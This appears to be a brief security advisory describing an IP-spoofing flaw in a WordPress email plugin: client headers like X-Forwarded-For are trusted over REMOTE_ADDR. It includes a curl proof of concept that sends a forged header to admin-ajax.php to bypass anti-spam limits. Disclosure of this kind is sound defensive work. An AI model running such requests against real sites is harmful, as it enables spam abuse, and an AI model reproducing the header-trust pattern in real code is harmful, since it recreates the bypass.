The plugin prioritizes getting a visitor’s IP from certain HTTP headers over PHP’s REMOTE_ADDR, which makes it possible to bypass IP-based anti-spamming restrictions.
Set HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR or any of the other headers used in get_ipaddress().
curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST -H 'X-Forwarded-For: 127.0.0.1' --data-raw 'action=email&yourname=admin&[email protected]&yourremarks=asdasd&friendname=Igor Popov&[email protected]&imageverify=ME5RJ&p=177&wp-email_nonce=646bfc1f45'